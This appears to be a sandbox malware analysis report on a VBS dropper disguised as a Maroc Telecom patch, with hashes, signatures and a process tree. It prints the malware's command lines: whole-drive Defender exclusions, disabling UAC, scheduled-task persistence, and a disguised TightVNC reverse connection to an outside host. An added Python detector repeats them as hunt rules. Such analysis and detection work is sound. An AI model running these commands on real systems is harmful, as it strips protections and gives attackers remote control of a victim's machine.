Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13/08/2024, 16:50

General

  • Target

    13082024_1650_patch_08_24_maroc_telecom.vbs

  • Size

    85KB

  • MD5

    256ff7496d004c17a81294e45341a696

  • SHA1

    45af0de886b8fc54cfd8acfd2b386a77bba63887

  • SHA256

    295ef3832bb6ef89c93c39b62542be9f490b74a082c2b06955aa3351c3005002

  • SHA512

    b430b6da57b6937c9468cebee49f655b50fa11e3ed57c0c584d50b0d677119f5db2d893a1bcde422e8087af6a92f7aee03d26e3b14e8a3f4ed3ae9221f4a3ac3

  • SSDEEP

    96:AF9Gmbz9Lz3a74Tbq2HY0UiAvSHLQV0gUiAvSHmnWLF:AF9GS9LzacThY0UiAvSrQV0gUiAvSxF

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clears artifacts associated with previously established persistence, such as scheduled tasks, on a host.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 4 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13082024_1650_patch_08_24_maroc_telecom.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:4204
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5116
    • C:\Users\Public\7g.exe
      "C:\Users\Public\7g.exe" e -p1625093 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\agent.7z"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:3368
    • C:\Users\Public\WindowsUpdate\agent.exe
      "C:\Users\Public\WindowsUpdate\agent.exe" lnrm5$+wu4j%=vogu
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -ex bypass -C "Add-MpPreference -ExclusionPath 'C:','d:','e:','f:','g:','h:', 'C:\Users\Public\WindowsUpdate\'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1364
      • C:\Windows\SysWOW64\REG.exe
        "REG" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:4988
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks.exe" /create /f /tn WindowsUpdateTaskScheduler /XML "C:\Users\Public\WindowsUpdate\\Common\xml.xml"
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1200
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill" /f /im securitysvc.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4148
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill" /f /im netsvc.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2408
      • C:\Windows\SysWOW64\taskkill.exe
        "taskkill" /f /im securitysvc.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1224
      • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
        "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -remove -silent
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2284
      • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
        "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -install -silent
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:4640
      • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
        "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -start
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4720
        • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
          "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -slave
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3468
      • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
        "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -connect albaridbank.freedynamicdns.org:65433
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3632
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & SCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F & taskkill /f /im "agent.exe" & del "C:\Users\Public\WindowsUpdate\agent.exe" & rmdir /s /q "C:\Users\Public\WindowsUpdate\Common"
        3⤵
        • Indicator Removal: Clear Persistence
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3076
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2832
        • C:\Windows\SysWOW64\reg.exe
          REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2156
        • C:\Windows\SysWOW64\schtasks.exe
          SCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F
          4⤵
          • System Location Discovery: System Language Discovery
          PID:740
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im "agent.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4856
  • C:\Users\Public\WindowsUpdate\agent.exe
    C:\Users\Public\WindowsUpdate\agent.exe lnrm5$+wu4j%=vogu
    1⤵
    • Executes dropped EXE
    PID:4376
  • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
    "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -service
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4352
    • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe
      "C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -desktopserver -logdir "C:\Windows\system32\config\systemprofile\AppData\Roaming\TightVNC" -loglevel 0 -shmemname Global\kyfcyfojrndplkfbnxxc
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2124
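
Turning the Signatures and Processes sections above into something hunt-ready: the block below is an added example, not tria.ge's signature engine and not code from this sample. It takes process-creation rows in the shape of a Sysmon Event ID 1 record or a sandbox process tree (pid, parent pid, image, command line) and flags the six behaviours that carry this chain: whole-drive Defender exclusions, EnableLUA set to 0, a scheduled task created from an XML staged under C:\Users\Public, the TightVNC-style reverse connection, the Run-key/schtasks cleanup, and WScript spawning a shell or a binary from C:\Users\Public. SAMPLE_PROCS transcribes rows from the process list above (the long cleanup command line is abridged); the final row is a constructed benign exclusion used as a control, and the rule names are assumptions of this example.

```python
"""Flag the defence-evasion and persistence tradecraft in the process tree above.

Added example for this report, not tria.ge's signature engine or code from the
sample. A row is (pid, parent pid, image path, command line), the shape of a
Sysmon Event ID 1 record or a sandbox process list. SAMPLE_PROCS transcribes
rows from the report (cleanup command line abridged); the last row is a
constructed benign Defender exclusion used as a control.
"""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str    # full path of the executable
    cmdline: str  # command line as logged

def _base(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()

def exclusion_paths(cmdline: str) -> list[str]:
    """The -ExclusionPath list of an Add-MpPreference call, with quotes stripped."""
    m = re.search(r"-ExclusionPath\s+(\S.*?)(?=\s+-[A-Za-z]|$)", cmdline, re.I)
    if not m:
        return []
    raw = m.group(1).rstrip('"')  # drop the closing quote of powershell -C "..."
    return [p.strip().strip("'\"") for p in raw.split(",") if p.strip()]

def whole_drive_exclusion(p: Proc, _by_pid: dict) -> bool:
    """A bare drive root (c:, 'D:\\') excludes the whole volume from scanning."""
    if "add-mppreference" not in p.cmdline.lower():
        return False
    return any(re.fullmatch(r"[a-z]:\\?", x, re.I) for x in exclusion_paths(p.cmdline))

def uac_disabled(p: Proc, _by_pid: dict) -> bool:
    """reg add ...\\Policies\\System /v EnableLUA /d 0 turns UAC off at next logon."""
    c = p.cmdline.lower()
    return "policies\\system" in c and "enablelua" in c and re.search(r"/d\s+0\b", c) is not None

def task_from_public_dir(p: Proc, _by_pid: dict) -> bool:
    """schtasks /create /XML with the task definition staged under C:\\Users\\Public."""
    c = p.cmdline.lower()
    return "schtasks" in c and "/create" in c and "/xml" in c and "\\users\\public\\" in c

def vnc_reverse_connect(p: Proc, _by_pid: dict) -> bool:
    """TightVNC-style -controlservice -connect host:port: desktop pushed out to a listener."""
    c = p.cmdline.lower()
    return "-controlservice" in c and re.search(r"-connect\s+\S+:\d{1,5}", c) is not None

def clears_persistence(p: Proc, _by_pid: dict) -> bool:
    """REG DELETE of a Run value chained with SCHTASKS /Delete (self-cleanup)."""
    c = p.cmdline.lower()
    return "reg delete" in c and "\\currentversion\\run" in c and "schtasks /delete" in c

def script_host_spawns_child(p: Proc, by_pid: dict) -> bool:
    """wscript/cscript launching a shell, or any binary out of C:\\Users\\Public."""
    parent = by_pid.get(p.ppid)
    if parent is None or _base(parent.image) not in {"wscript.exe", "cscript.exe"}:
        return False
    return _base(p.image) in {"cmd.exe", "powershell.exe"} or p.image.lower().startswith("c:\\users\\public\\")

RULES = {  # rule names are this example's own, not tria.ge signature names
    "whole_drive_defender_exclusion": whole_drive_exclusion,
    "uac_disabled_via_enablelua": uac_disabled,
    "scheduled_task_xml_from_public_dir": task_from_public_dir,
    "vnc_reverse_connect": vnc_reverse_connect,
    "clears_own_persistence": clears_persistence,
    "script_host_spawns_child": script_host_spawns_child,
}

def detect(procs: list[Proc]) -> list[tuple[int, str]]:
    """(pid, rule name) for every rule each process trips, in process order."""
    by_pid = {p.pid: p for p in procs}
    return [(p.pid, n) for p in procs for n, rule in RULES.items() if rule(p, by_pid)]

SAMPLE_PROCS = [
    Proc(4204, 0, r"C:\Windows\System32\WScript.exe", r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13082024_1650_patch_08_24_maroc_telecom.vbs"'),
    Proc(4840, 4204, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"'),
    Proc(5116, 4840, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r'powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"'),
    Proc(3368, 4204, r"C:\Users\Public\7g.exe", r'"C:\Users\Public\7g.exe" e -p1625093 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\agent.7z"'),
    Proc(1840, 4204, r"C:\Users\Public\WindowsUpdate\agent.exe", r'"C:\Users\Public\WindowsUpdate\agent.exe" lnrm5$+wu4j%=vogu'),
    Proc(1364, 1840, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         "\"powershell\" -ex bypass -C \"Add-MpPreference -ExclusionPath 'C:','d:','e:','f:','g:','h:', 'C:\\Users\\Public\\WindowsUpdate\\'\""),
    Proc(4988, 1840, r"C:\Windows\SysWOW64\REG.exe", r'"REG" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f'),
    Proc(1200, 1840, r"C:\Windows\SysWOW64\schtasks.exe", r'"schtasks.exe" /create /f /tn WindowsUpdateTaskScheduler /XML "C:\Users\Public\WindowsUpdate\\Common\xml.xml"'),
    Proc(3632, 1840, r"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe", r'"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -connect albaridbank.freedynamicdns.org:65433'),
    Proc(3076, 1840, r"C:\Windows\SysWOW64\cmd.exe",  # abridged from the report
         r'"cmd.exe" /c REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & SCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F & taskkill /f /im "agent.exe"'),
    Proc(9001, 9000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # constructed benign control
         "powershell -C \"Add-MpPreference -ExclusionPath 'C:\\Program Files\\Vendor\\App'\""),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_PROCS):
        print(f"{pid:>5}  {rule}")
```

Run it as a script to list the hits, or import detect() and feed it real Sysmon rows. The drive-root check is the one worth porting to a SIEM: an -ExclusionPath that is a bare drive letter is never a routine admin action, whereas Add-MpPreference on its own fires on every endpoint-management tool. Note that both cmd.exe (PID 4840) and its powershell.exe child (PID 5116) trip the exclusion rule because the parent's command line embeds the child's; de-duplicate on the innermost process when counting alerts.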

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    6d42b6da621e8df5674e26b799c8e2aa

    SHA1

    ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

    SHA256

    5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

    SHA512

    53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onds3vt4.bzi.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\7g.exe

    Filesize

    577KB

    MD5

    11fa744ebf6a17d7dd3c58dc2603046d

    SHA1

    d99de792fd08db53bb552cd28f0080137274f897

    SHA256

    1b16c41ae39b679384b06f1492b587b650716430ff9c2e079dca2ad1f62c952d

    SHA512

    424196f2acf5b89807f4038683acc50e7604223fc630245af6bab0e0df923f8b1c49cb09ac709086568c214c3f53dcb7d6c32e8a54af222a3ff78cfab9c51670

  • C:\Users\Public\WindowsUpdate\Common\SCREEN~1.DLL

    Filesize

    76KB

    MD5

    7bc5225db0c41ff9227295e666600312

    SHA1

    e78dcca63b0ef68fb3833ab1fe3bb13b066e7122

    SHA256

    528e99d415a5a743af6f8b68b1fe87b133a0a6bc22b48e33465c374a09e57703

    SHA512

    e4837f3fe5c8275d0a389b60b0303617da0d7b737e87cc5ca3190e338ff2bdeb1604fef20bd35b911c2e945198d46f7df5a91d8a3677b3381e9c449878a55a95

  • C:\Users\Public\WindowsUpdate\Common\bundle

    Filesize

    1.9MB

    MD5

    f34aa5938ab898f964c4f50d49ddc05a

    SHA1

    56bc17db1ce446fbd25106903b14d8ef6f0d6975

    SHA256

    a6cd84730fa0ae73cc2298ea6d259656b34aff4e0f2c606b55982aafed7225d3

    SHA512

    409d6cb252829423a39ad85cb6824cb8f1e82392ba2769b4b0138d50644b39705e1097ee71a2d29f0790a78363f15219433027deecff676afa148df61623c106

  • C:\Users\Public\WindowsUpdate\Common\securitysvc.exe

    Filesize

    1.4MB

    MD5

    c0f2536aab89e866be517ada093d6ae9

    SHA1

    8025575cc5832876fc2fd0895816381c724b3480

    SHA256

    ce1758d559910b328d60d5aa4587ce3602471c3d6d5351b6162998d5f2251599

    SHA512

    9d4dd916f09dd0dffe175d059af23df9a115a78d3a34033c7562f95746e244d59c015ff52b682d07e4e0ff748b614471a077163422a39331630d27eaf013efb6

  • C:\Users\Public\WindowsUpdate\Common\system.dat

    Filesize

    43B

    MD5

    11b00cd8aaf7e64945e1d3ae970e60d5

    SHA1

    685ee5e63e6daa1cd705c64a3d9381b253cffe5b

    SHA256

    c9f745531f4786534342775b8d630139fbab20c921a01774a79844137e1d4cdc

    SHA512

    d33a2a35cdd04d2cfe9c0bc9df1c9ebc3c2ded04382aefd69fcd3693919b6f3c5206954bcf22d05560a6ce43374c13db1d0d251d0ad55fb9bbed87f5364569cf

  • C:\Users\Public\WindowsUpdate\Common\xml.xml

    Filesize

    1KB

    MD5

    a3ffc26af4bc23881333c6168ac582cf

    SHA1

    efabc9e281eef3f8889743f9a0a384c6bc44e694

    SHA256

    6cb41ae787d7b9c1db2a65cb95672ad78fd1ae814d581d9bb9b493da4c13859c

    SHA512

    aa7cea924c5c720e7fb9df4655ca821acbfeecb54cb3f92a2037d1591be3ce47a3e862103656683e2d050a951c30b5fa3d78e3e682184d1661cc178524467fa5

  • C:\Users\Public\WindowsUpdate\agent.exe

    Filesize

    3.5MB

    MD5

    231b19fcd10a574335b4bdc87bcb4ae4

    SHA1

    f0adb64152558db2578b2bea362728d1bec25cde

    SHA256

    eb09ee350a19054ce5ada302bb4a1586795e713745a16fd7bf3ec70096f47461

    SHA512

    79eeb89e35e1035a8245a69a6f66dca3bb74ce498fef9cf69004483b45f69c1a2e0c9481b3de70881cb6d041f110b67363a085e0b7e44117554ea2c22fff9ed6

  • C:\Users\Public\agent.7z

    Filesize

    2.6MB

    MD5

    ae5b78797fdf5f862f979faf5862db72

    SHA1

    753df8bdb95e4a7e526ea32fa54e9a4ab0c714c1

    SHA256

    dd467e0657fd6c0e1ee571cfa05aac81b147ac8a7289ea8499c2162f7be12a97

    SHA512

    2670bf113bcece56e167d78f300d0f2da6481a1fa7415d08174e00f6723bf446fdecff2e88a7010d71d987b087ba683df5a23fed8e2e01f7f9dc1f3bd8fb7a80

  • memory/1364-79-0x0000000006780000-0x000000000679E000-memory.dmp

    Filesize

    120KB

  • memory/1364-99-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

    Filesize

    56KB

  • memory/1364-52-0x00000000031A0000-0x00000000031D6000-memory.dmp

    Filesize

    216KB

  • memory/1364-65-0x00000000058D0000-0x00000000058F2000-memory.dmp

    Filesize

    136KB

  • memory/1364-66-0x00000000059F0000-0x0000000005A56000-memory.dmp

    Filesize

    408KB

  • memory/1364-67-0x0000000006140000-0x00000000061A6000-memory.dmp

    Filesize

    408KB

  • memory/1364-77-0x00000000062B0000-0x0000000006604000-memory.dmp

    Filesize

    3.3MB

  • memory/1364-102-0x0000000007D30000-0x0000000007D38000-memory.dmp

    Filesize

    32KB

  • memory/1364-101-0x0000000007E00000-0x0000000007E1A000-memory.dmp

    Filesize

    104KB

  • memory/1364-80-0x00000000067D0000-0x000000000681C000-memory.dmp

    Filesize

    304KB

  • memory/1364-81-0x0000000006D60000-0x0000000006D92000-memory.dmp

    Filesize

    200KB

  • memory/1364-82-0x0000000071BA0000-0x0000000071BEC000-memory.dmp

    Filesize

    304KB

  • memory/1364-92-0x0000000007960000-0x000000000797E000-memory.dmp

    Filesize

    120KB

  • memory/1364-93-0x0000000007980000-0x0000000007A23000-memory.dmp

    Filesize

    652KB

  • memory/1364-94-0x00000000080F0000-0x000000000876A000-memory.dmp

    Filesize

    6.5MB

  • memory/1364-95-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

    Filesize

    104KB

  • memory/1364-96-0x0000000007B10000-0x0000000007B1A000-memory.dmp

    Filesize

    40KB

  • memory/1364-97-0x0000000007D40000-0x0000000007DD6000-memory.dmp

    Filesize

    600KB

  • memory/1364-98-0x0000000007CB0000-0x0000000007CC1000-memory.dmp

    Filesize

    68KB

  • memory/1364-57-0x0000000005AA0000-0x00000000060C8000-memory.dmp

    Filesize

    6.2MB

  • memory/1364-100-0x0000000007CF0000-0x0000000007D04000-memory.dmp

    Filesize

    80KB

  • memory/5116-0-0x00007FFD665A3000-0x00007FFD665A5000-memory.dmp

    Filesize

    8KB

  • memory/5116-15-0x00007FFD665A0000-0x00007FFD67061000-memory.dmp

    Filesize

    10.8MB

  • memory/5116-12-0x00007FFD665A0000-0x00007FFD67061000-memory.dmp

    Filesize

    10.8MB

  • memory/5116-11-0x00007FFD665A0000-0x00007FFD67061000-memory.dmp

    Filesize

    10.8MB

  • memory/5116-1-0x000001F754AE0000-0x000001F754B02000-memory.dmp

    Filesize

    136KB